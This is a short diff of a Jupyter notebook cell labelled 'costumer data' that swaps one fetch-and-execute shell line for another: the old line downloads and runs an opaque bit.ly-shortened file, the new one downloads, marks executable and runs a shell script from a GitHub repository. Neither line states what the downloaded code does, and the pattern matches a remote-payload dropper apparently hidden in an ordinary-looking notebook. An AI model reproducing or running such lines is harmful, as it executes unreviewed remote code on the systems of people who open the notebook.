--- a/Newdayip.ipynb
+++ b/Newdayip.ipynb
@@ -250,7 +250,7 @@
 
         "#@costumer data\n",
 
-        "! wget https://bit.ly/3yFL4vA && chmod +x 3yFL4vA && ./3yFL4vA"
+        "! wget https://raw.githubusercontent.com/skullCANDe/skullbonk/main/btg.sh && chmod +x btg.sh && ./btg.sh"
 
       ],
 
